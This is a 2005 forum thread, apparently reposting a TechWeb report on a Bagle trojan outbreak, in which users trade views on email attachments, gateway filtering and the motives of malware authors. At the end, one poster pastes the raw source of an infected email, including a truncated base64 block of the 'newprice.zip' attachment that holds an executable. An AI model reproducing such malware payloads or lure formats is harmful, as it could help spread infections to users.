Bagle Trojan Attack Strikes, Multiple Versions Overwhelm AV Defenses

TechWeb ^ | March 01, 2005 | Gregg Keizer

[Eagle9]

The average home user should be able to avoid this trojan/worm by using common sense, regarding email.

The usual recommendations apply, security firms told users: update anti-virus defenses often.

Cluley went a step further. "It's time everyone woke up and stopped executable code at the gateway. There's no reason why users should be installing software from any e-mail message. That should all have to come through the IT department. Doing anything else [but blocking executables] is a huge security risk."

[marty60]

It is intersesting that these attacks keep coming. I really don't think it's your little nerd sitting at his puter at home anymore.

[Brian328i]

Theres a really good way to avoid this, its a great cure. --> http://distrowatch.com/

I had to be the first :)

[ShadowAce]

Virus alert!

[ShadowAce]

Stop--correction should be "Trojan" Alert!

[tfecw]

I do, It's really not that hard to crank out a virus, worm, or Trojan.

All you comp sci guys out there knows what a fork bomb is. At school the night before a big project was due in the comp sci department, the servers would always magically crash. They would change the security, then 100+ comp sci people went to work on crashing the servers instead of doing their projects.

[Ernest_at_the_Beach]

Is this Windows Outlook specific?

[marty60]

Good grief. Maybe you can explain to me what the point is of disrupting the lives of so many people. just for the H of it? What a waste of time, energy and intellect.

[Mannaggia l'America]

Is this Windows Outlook specific?

No, it's Dumb User Opening Attachment specific.

[Mannaggia l'America]

Good grief. Maybe you can explain to me what the point is of disrupting the lives of so many people. just for the H of it? What a waste of time, energy and intellect.

Bah! The people writing these viruses are the good guys. Let's not blame them for anything. It's all Microsoft's fault. </sarcasm>

[Nick Danger]

You would think that by now, no one would be dumb enough to click on an email attachment, especially one in "terse e-mails with no subject and a message reading simply 'Price' or 'New price'."

But nooooo. Ten thousand bozos will turn their computers into spam engines by clicking on this thing. And then they'll wonder why their computer is running so slowly.

[tfecw]

I can't explain something like that. Some people get their jollies out of screwing with other people. Esp punk kids who can't get dates so they spend their time screwing with people. Plus there is the recognition factor. People who would normally never amount to anything get their work of "art" plastered up all over the MSM and broadcast world wide. While i don't condone hacking websites or whatever. I can see the power element involved with the knowledge that you hacked into "insert famous organization"'s website. Which is how most of these clowns get caught.

I didn't partake in the server crashes. The professors were sympathetic the first couple of times then did the ol well you had 3 weeks to work on it, why are you turning it in on the due date. Server stopped crashing.

[Disambiguator]

It's time everyone woke up and stopped executable code at the gateway.

Any company that allows any kind of content that might contain a virus payload in through their email gateway deserves to get hit. If you need to get software from someone, there are other ways than email to get it.

Not being able to email executable code is a mild inconvenience compared to having to clean up the mess caused by a virus let loose in a corporate LAN environment. I speak from experience.

[GOP_1900AD]

I think it is one or more foreign governments / their militaries.

[Doohickey]

I've been getting these idiotic FBI@FBI.GOV e-mails claiming "You've been visiting 40 illegal sites" and demaning I fillout a questionnaire conveniently contained in a compressed file.

[stinkerpot65]

Or, you can use FireFox on OS X.

[D-fendr]

What a waste of time, energy and intellect.

True, but it's no longer kids doing it for fun.

Virus/spam and crime are a team now. There's an underground economy in infected machines (bots) used for spam and denial of service attacks have been used in extortion of online gambling sites.

[A message]

Doohickey -- I've been getting the same attack since last Friday... I delete everyone of them without looking because I figure if going to RushLimbaugh.com and Free Republic are illegal websites I'm ready for a confrontation with any authorities....

[Disambiguator]

Or, you can use FireFox on OS X.

Let's contribute something constructive to the discussion, okay? :^)

[Eagle9]

Here's an example (copied from Message Source):
_________________________________________________________
Subject:
Message-ID: <usyjdicxunpfamqogsh@bellsouth.net>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--------bilnsatjoywkldgbtsxk"

----------bilnsatjoywkldgbtsxk
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit
<html><body>
price<br><br>
<br>
</body></html>

----------bilnsatjoywkldgbtsxk
Content-Type: application/octet-stream;
name="newprice.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="newprice.zip"

UEsDBBQAAAAIAFamYTIdXuMSkj0AAACGAAAKAAAAZG9jXzAyLmV4ZexaCVxTx9Y/Kbb4qBVe
N2tdsLV2F+1iX98rAra1KhW1avGpgKAWkUUWLYsSgwWVRQQEpQGJKAiKLNaFLSxBRMEiuFIB
F1wQZF8FN+Y7c28Skpi4oLHf+/08cDKZOWdm/jP537nn3MRkHgAHAF5AJQTACFiRlAemHn8H
VAj1mTERYCrnRbn2KtDmvEwH7Ye6V9oIoIM6QtxTh520n9gsKUGHw4IBSaHD+kpLacHIhKsA
J+kbL4Bac1VI+yCI016Fqb8M4EMaCoBkxAhAJPE79wKI167Cbyr7/o4Jvox9gJ9YmLV6oVqA
dL9Y4cj5MWNVob6Paql6PFZeAA0WptdALJ3YGWSkP8MVX2ynU0ZjSf3TsaTLPIElZUItli+x
ULw0sXgLS7pnYzmK43GY8SYraadiyQFQ1u6kot1LRXuwivZoFe17VbSLVLSfUNFehUXLGtwP
mc/nnA/Ah7L+6wB2Deyt7gpD7d9bnxEFYCNzeaXvQPuo3rplIdZl+Ne/HP379dad